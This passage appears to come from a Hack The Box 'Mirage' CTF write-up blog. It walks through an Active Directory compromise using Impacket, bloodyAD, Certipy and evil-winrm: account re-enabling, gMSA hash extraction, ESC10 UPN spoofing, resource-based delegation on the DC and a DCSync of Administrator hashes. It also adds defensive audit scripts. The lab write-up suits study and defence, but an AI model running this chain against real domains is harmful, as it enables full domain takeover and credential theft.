LastLogonDate : 5/22/2025 2:45:29 PM
lastLogonTimestamp : 133924239295082185
LockedOut : False
logonCount : 13
logonHours : {0, 0, 0, 0...}
LogonWorkstations :
Manager :
MemberOf : {CN=IT_Contractors,OU=Groups,OU=Contractors,OU=IT_Staff,DC=mirage,DC=htb}
MNSLogonAccount : False
MobilePhone :
Modified : 5/25/2025 11:44:43 AM
modifyTimeStamp : 5/25/2025 11:44:43 AM
msDS-SupportedEncryptionTypes : 0
msDS-User-Account-Control-Computed : 0
Name : javier.mmarshall
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Person,CN=Schema,CN=Configuration,DC=mirage,DC=htb
ObjectClass : user
ObjectGUID : c52e731b-30c1-439c-a6b9-0c2f804e5f08
objectSid : S-1-5-21-2127163471-3824721834-2568365109-1108
Office :
OfficePhone :
Organization :
OtherName :
PasswordExpired : False
PasswordLastSet : 5/25/2025 11:44:43 AM
PasswordNeverExpires : True
PasswordNotRequired : False
POBox :
PostalCode :
PrimaryGroup : CN=Domain Users,CN=Users,DC=mirage,DC=htb
primaryGroupID : 513
PrincipalsAllowedToDelegateToAccount : {}
ProfilePath :
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133926722832178700
SamAccountName : javier.mmarshall
sAMAccountType : 805306368
ScriptPath :
sDRightsEffective : 0
ServicePrincipalNames : {}
SID : S-1-5-21-2127163471-3824721834-2568365109-1108
SIDHistory : {}
SmartcardLogonRequired : False
State :
StreetAddress :
Surname :
Title :
TrustedForDelegation : False
TrustedToAuthForDelegation : False
UseDESKeyOnly : False
userAccountControl : 66050
userCertificate : {}
UserPrincipalName : [email protected]
uSNChanged : 69841
uSNCreated : 24655
whenChanged : 5/25/2025 11:44:43 AM
whenCreated : 5/2/2025 1:33:11 AM



PS C:\Windows\system32>
(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py mirage.htb/'mark.bbond':'1day@atime' -dc-ip dc01.mirage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in mark.bbond.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=mark.bbond.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ bloodyAD --host 10.129.104.218 -d mirage.htb -k --dc-ip dc01.mirage.htb remove uac JAVIER.MMARSHALL -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from JAVIER.MMARSHALL's userAccountControl

Even after the account is enabled, logon is still refused outside the time window allowed by its logonHours attribute, and javier's logonHours is all zeros.

(base) ┌──(kali㉿kali)-[~/gMSADumper]
└─$ bloodyAD --host 10.129.104.218 -d mirage.htb -k --dc-ip dc01.mirage.htb get object mark.bbond

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
accountExpires: 1601-01-01 00:00:00+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: mark.bbond
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-07-04 19:36:40+00:00
displayName: mark.bbond
givenName: mark.bbond
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-07-23 20:56:04.981028+00:00
lastLogonTimestamp: 2025-07-23 17:50:03.460126+00:00
logonCount: 71
logonHours: ////////////////////////////

javier's logonHours should match mark.bbond's value, ////////////////////////////, which is the base64 encoding of 21 bytes of 0xFF (every hour of the week allowed):
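Both attributes touched in this step can be decoded offline, which is how a defender would spot the change. The block below is an added example, not code from the write-up: it decodes userAccountControl into flag names, expands the 21-byte logonHours bitmask (168 bits, one per hour, starting Sunday 00:00 UTC, least-significant bit first within each byte, which is the documented layout), and audits constructed records built from the javier.mmarshall values shown above, before and after the modification. Treating an OU named Disabled as the parking place for retired accounts is an assumption of this example, read from the distinguishedName.

```python
import base64

# userAccountControl bits (subset of the documented ADS_USER_FLAG values)
UAC_FLAGS = {
    0x0001: "SCRIPT", 0x0002: "ACCOUNTDISABLE", 0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT", 0x0020: "PASSWD_NOTREQD", 0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0200: "NORMAL_ACCOUNT", 0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT", 0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED", 0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED", 0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH", 0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

DAYS = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]


def decode_uac(value: int) -> set:
    """Names of the flags set in a userAccountControl integer (66050 -> 3 flags)."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def decode_logon_hours(raw: bytes) -> list:
    """Expand the 21-byte mask into 7 lists of 24 booleans (UTC hours, Sunday first).

    Bit i of the 168-bit sequence is byte i // 8, bit position i % 8 (LSB first).
    """
    if len(raw) != 21:
        raise ValueError("logonHours must be exactly 21 bytes")
    bits = [bool((raw[i // 8] >> (i % 8)) & 1) for i in range(168)]
    return [bits[d * 24:(d + 1) * 24] for d in range(7)]


def allowed_hours(raw: bytes) -> int:
    """Total number of hours per week in which logon is permitted."""
    return sum(sum(day) for day in decode_logon_hours(raw))


def audit_user(rec: dict) -> list:
    """Findings for one user record (attributes as returned by LDAP, logonHours base64)."""
    findings = []
    flags = decode_uac(rec["userAccountControl"])
    hours = allowed_hours(base64.b64decode(rec["logonHours"]))
    parked = ",OU=Disabled," in rec["distinguishedName"]  # assumption: OU naming convention
    if parked and "ACCOUNTDISABLE" not in flags:
        findings.append("enabled account sitting in the Disabled OU")
    if parked and hours:
        findings.append(f"account in the Disabled OU may log on during {hours} hours/week")
    if "DONT_REQ_PREAUTH" in flags:
        findings.append("Kerberos pre-authentication not required")
    if "PASSWD_NOTREQD" in flags:
        findings.append("password not required")
    return findings


# Constructed records built from the values shown on this page
JAVIER_BEFORE = {
    "sAMAccountName": "javier.mmarshall",
    "distinguishedName": "CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb",
    "userAccountControl": 66050,          # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | ACCOUNTDISABLE
    "logonHours": "A" * 28,               # base64 of 21 zero bytes: never allowed to log on
}
JAVIER_AFTER = {
    **JAVIER_BEFORE,
    "userAccountControl": 66048,          # ACCOUNTDISABLE cleared
    "logonHours": "/" * 28,               # base64 of 21 x 0xFF: every hour allowed
}

if __name__ == "__main__":
    for label, rec in (("before", JAVIER_BEFORE), ("after", JAVIER_AFTER)):
        print(label, sorted(decode_uac(rec["userAccountControl"])), audit_user(rec))
```

Run against a periodic LDAP export, the two "Disabled OU" findings fire the moment the account is re-enabled or its logon window widened, regardless of whether the change went through LDAP, PowerShell or bloodyAD.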

(base) ┌──(kali㉿kali)-[~]
└─$ cat update_javier.py
from ldap3 import Server, Connection, SASL, GSSAPI, MODIFY_REPLACE
import os

# Authenticate to the DC with the Kerberos ticket obtained for mark.bbond
os.environ["KRB5CCNAME"] = "./mark.bbond.ccache"

server = Server("dc01.mirage.htb", get_info=None)
conn = Connection(server, authentication=SASL, sasl_mechanism=GSSAPI)
conn.bind()

dn = "CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb"
# logonHours is a 21-byte bitmask (168 bits, one per hour of the week); all 0xFF allows every hour
logon_hours_hex = "FF" * 21
logon_hours_bytes = bytes.fromhex(logon_hours_hex)

conn.modify(dn, {"logonHours": [(MODIFY_REPLACE, [logon_hours_bytes])]})
print(conn.result)
(base) ┌──(kali㉿kali)-[~]
└─$ bloodyAD --host 10.129.104.218 -d mirage.htb -k --dc-ip dc01.mirage.htb get object JAVIER.MMARSHALL

distinguishedName: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: javier.mmarshall
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-05-22 21:49:20+00:00
description: Contoso Contractors
displayName: javier.mmarshall
givenName: javier.mmarshall
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-07-23 20:56:28.711298+00:00
lastLogonTimestamp: 2025-07-23 20:52:44.575126+00:00
logonCount: 25
logonHours: ////////////////////////////
(base) ┌──(kali㉿kali)-[~]
└─$ bloodyAD --host 10.129.104.218 -d mirage.htb -k --dc-ip dc01.mirage.htb set password JAVIER.MMARSHALL "kujenPassword123"
[+] Password changed successfully!
(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py mirage.htb/'JAVIER.MMARSHALL':'kujenPassword123' -dc-ip dc01.mirage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in JAVIER.MMARSHALL.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=JAVIER.MMARSHALL.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ nxc ldap 10.129.104.218 -u JAVIER.MMARSHALL -p kujenPassword123 -k --gmsa
LDAP 10.129.104.218 389 DC01 [*] None (name:DC01) (domain:mirage.htb)
LDAPS 10.129.104.218 636 DC01 [+] mirage.htb\JAVIER.MMARSHALL:kujenPassword123
LDAPS 10.129.104.218 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.104.218 636 DC01 Account: Mirage-Service$ NTLM: 305806d84f7c1be93a07aaf40f0c7866 PrincipalsAllowedToReadPassword: javier.mmarshall
PS C:\users\mark.bbond\documents> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.ObjectDN -match "mark.bbond"}
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.ObjectDN -match "mark.bbond"}


ObjectDN : CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteProperty
ObjectAceType : Public-Information
AceFlags : None
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2127163471-3824721834-2568365109-1112
IdentityReferenceName : Mirage-Service$
IdentityReferenceDomain : mirage.htb
IdentityReferenceDN : CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
IdentityReferenceClass : computer
(base) ┌──(kali㉿kali)-[~]
└─$ certipy account update \
-user 'mark.bbond' \
-upn '[email protected]' \
-u '[email protected]' \
-k -no-pass \
-dc-ip 10.129.104.218 \
-target dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'mark.bbond':
userPrincipalName : dc01$@mirage.htb
[*] Successfully updated 'mark.bbond'

The PowerView output shows that Mirage-Service$ holds WriteProperty over the Public-Information property set on mark.bbond, and that set includes userPrincipalName. That single write is what ESC10 needs: as Mirage-Service$ we rewrite mark.bbond's UPN to dc01$@mirage.htb, then enrol a certificate as mark.bbond so that the certificate's SAN UPN names the domain controller's machine account (UPN spoofing).

Two details make this work and are worth checking on a real engagement. First, the certificate still carries mark.bbond's own SID (S-1-5-21-2127163471-3824721834-2568365109-1109) in the szOID_NTDS_CA_SECURITY_EXT extension; it is usable as DC01$ only because this is the Schannel variant of ESC10, where the certificate-to-account mapping goes by UPN alone and the SID extension is ignored. The value to inspect is CertificateMappingMethods under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel, as described in the certipy wiki. Second, the UPN has to be reverted to mark.bbond@mirage.htb before the certificate is used: while the spoofed UPN is in place a mapping lookup matches mark.bbond's explicit UPN, and only once it is gone does dc01$@mirage.htb fall through to the implicit sAMAccountName@domain name of DC01$.

With a certificate that maps to DC01$ we authenticate to LDAPS with certipy auth -ldap-shell and, acting as the DC's own machine account, write msDS-AllowedToActOnBehalfOfOtherIdentity on the DC01 computer object to grant resource-based constrained delegation to the gMSA Mirage-Service$. The gMSA can then S4U2Self/S4U2Proxy a service ticket for cifs/dc01.mirage.htb as dc01$, and because a domain controller's machine account holds replication rights, secretsdump can use DRSUAPI with that ticket to pull the Administrator hash. These are the steps the certipy wiki documents for ESC10.
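
As an added example (not part of the original write-up and not Certipy code), the following Python models the two facts the paragraph above leans on: how a UPN-only certificate mapping resolves a SAN UPN, and which directory artefacts a defender would audit for afterwards. The in-memory directory is constructed, reusing the SIDs printed in the transcript; the lookup order (an explicit userPrincipalName match first, then the implicit sAMAccountName@domain name) is an assumption modelled on the ESC10 description, not an implementation of the DC's mapping code.

```python
"""
Added illustration of the ESC10 UPN-spoof-and-revert dance and of the two
artefacts it leaves in the directory. The directory is a constructed
in-memory stand-in for LDAP; the mapping order (explicit UPN, then implicit
sAMAccountName@domain) is an assumption, not DC code.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

DOMAIN = "mirage.htb"


@dataclass
class Account:
    sam: str                                   # sAMAccountName ("DC01$" for computers)
    sid: str
    upn: Optional[str] = None                  # explicit userPrincipalName; computers normally have none
    is_dc: bool = False
    allowed_to_act: List[str] = field(default_factory=list)  # msDS-AllowedToActOnBehalfOfOtherIdentity, as SIDs


def implicit_upn(acct: Account) -> str:
    """Every account answers to sAMAccountName@domain even without an explicit UPN."""
    return f"{acct.sam}@{DOMAIN}".lower()


def map_san_upn(san_upn: str, directory: List[Account]) -> Optional[Account]:
    """Resolve a certificate's SAN UPN as a UPN-only mapping would (assumed order):
    an explicit userPrincipalName match wins, otherwise fall back to the implicit UPN."""
    wanted = san_upn.lower()
    for acct in directory:
        if acct.upn and acct.upn.lower() == wanted:
            return acct
    for acct in directory:
        if implicit_upn(acct) == wanted:
            return acct
    return None


def find_upn_collisions(directory: List[Account]) -> List[Tuple[str, str]]:
    """Users whose explicit UPN equals some other account's implicit UPN.
    This state exists only between 'account update' and the revert, so it is
    the window a detection has to catch."""
    hits = []
    for user in directory:
        if not user.upn:
            continue
        for other in directory:
            if other is not user and implicit_upn(other) == user.upn.lower():
                hits.append((user.sam, other.sam))
    return hits


def find_rbcd_on_dcs(directory: List[Account]) -> List[Tuple[str, List[str]]]:
    """Domain controllers whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated.
    A DC should never delegate to anyone; any entry here is the set_rbcd footprint."""
    sam_by_sid: Dict[str, str] = {a.sid: a.sam for a in directory}
    return [(dc.sam, [sam_by_sid.get(s, s) for s in dc.allowed_to_act])
            for dc in directory if dc.is_dc and dc.allowed_to_act]


def build_directory() -> List[Account]:
    """Constructed sample; the SIDs are the ones printed in the transcript."""
    base = "S-1-5-21-2127163471-3824721834-2568365109"
    return [
        Account("DC01$", f"{base}-1000", is_dc=True),
        Account("mark.bbond", f"{base}-1109", upn=f"mark.bbond@{DOMAIN}"),
        Account("Mirage-Service$", f"{base}-1112"),
    ]


def replay_chain() -> Dict[str, object]:
    """Walk the directory through the states the transcript goes through and record
    what a certificate carrying 'dc01$@mirage.htb' in its SAN maps to at each step."""
    d = build_directory()
    mark = next(a for a in d if a.sam == "mark.bbond")
    dc = next(a for a in d if a.is_dc)
    svc = next(a for a in d if a.sam == "Mirage-Service$")
    out: Dict[str, object] = {}

    # 1. certipy account update: mark.bbond's UPN now reads dc01$@mirage.htb, and the
    #    certificate requested as mark.bbond carries that UPN in its SAN.
    mark.upn = f"dc01$@{DOMAIN}"
    san_upn = mark.upn
    out["collisions"] = find_upn_collisions(d)
    # Authenticating now would still land on mark.bbond: the explicit UPN wins.
    out["during_spoof"] = map_san_upn(san_upn, d).sam

    # 2. Revert the UPN. The certificate is unchanged, but the only account that still
    #    answers to dc01$@mirage.htb is DC01$ through its implicit UPN.
    mark.upn = f"mark.bbond@{DOMAIN}"
    out["after_revert"] = map_san_upn(san_upn, d).sam

    # 3. set_rbcd dc01$ Mirage-Service$ issued as DC01$: the write S4U2Proxy relies on.
    dc.allowed_to_act.append(svc.sid)
    out["rbcd"] = find_rbcd_on_dcs(d)
    return out


if __name__ == "__main__":
    for key, value in replay_chain().items():
        print(f"{key}: {value}")
```

Running it prints the collision that exists only between the account update and the revert, the mapping outcome before and after the revert, and the delegation entry left on DC01$. The two audit functions are the queries to port to real LDAP: users whose userPrincipalName equals another object's sAMAccountName@domain (in practice, any user UPN whose local part ends in "$"), and domain controllers with a populated msDS-AllowedToActOnBehalfOfOtherIdentity.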

(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py mirage.htb/'mark.bbond':'1day@atime' -dc-ip dc01.mirage.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in mark.bbond.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=mark.bbond.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ certipy req -u [email protected] -no-pass -k -ca mirage-DC01-CA -template User -dc-ip 10.129.104.218 -dc-host dc01.mirage.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'

(base) ┌──(kali㉿kali)-[~]
└─$ getTGT.py MIRAGE.HTB/Mirage-Service$ -hashes :305806d84f7c1be93a07aaf40f0c7866
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Mirage-Service$.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Mirage-Service\$.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ certipy-ad account \
-u 'mirage-service$' \
-k -no-pass \
-target 'dc01.mirage.htb' \
-upn '[email protected]' \
-user 'mark.bbond' \
update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: dc01.mirage.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'mark.bbond':
userPrincipalName : [email protected]
[*] Successfully updated 'mark.bbond'

(base) ┌──(kali㉿kali)-[~]
└─$ certipy auth -pfx dc01.pfx -dc-ip 10.129.104.218 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*] SAN UPN: '[email protected]'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.104.218:636'
[*] Authenticated to '10.129.104.218' as: 'u:MIRAGE\\DC01$'
Type help for list of commands

# whoami
u:MIRAGE\DC01$

# set_rbcd dc01$ Mirage-Service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000

Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
Mirage-Service$ can now impersonate users on dc01$ via S4U2Proxy

# Bye!


(base) ┌──(kali㉿kali)-[~]
└─$ impacket-getTGT -dc-ip 10.129.104.218 "mirage.htb/Mirage-Service$" -hashes :305806d84f7c1be93a07aaf40f0c7866
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Mirage-Service$.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME='Mirage-Service$.ccache'

(base) ┌──(kali㉿kali)-[~]
└─$ impacket-getST -spn 'cifs/dc01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.129.104.218 'mirage.htb/Mirage-Service$' -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@cifs_dc01[email protected]

(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=dc01\$@cifs_dc01[email protected]

(base) ┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'dc01$'@dc01.mirage.htb -k -no-pass -dc-ip 10.129.104.218 -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619
[*] Cleaning up...

And finally claim my root flag:

(base) ┌──(kali㉿kali)-[~]
└─$ impacket-getTGT -dc-ip 10.129.104.218 "mirage.htb/Administrator" -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Administrator.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache

(base) ┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.mirage.htb -r mirage.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
ae9c51e9d9569cef82df05dce7bb7c80
  • Title: Hackthebox: Mirage
  • Author: Foued SAIDI
  • Created at : 2025-11-22 20:59:41
  • Updated at : 2025-11-22 21:03:46
  • Link: https://kujen5.github.io/2025/11/22/Hackthebox-Mirage/
  • License: This work is licensed under CC BY-NC-SA 4.0.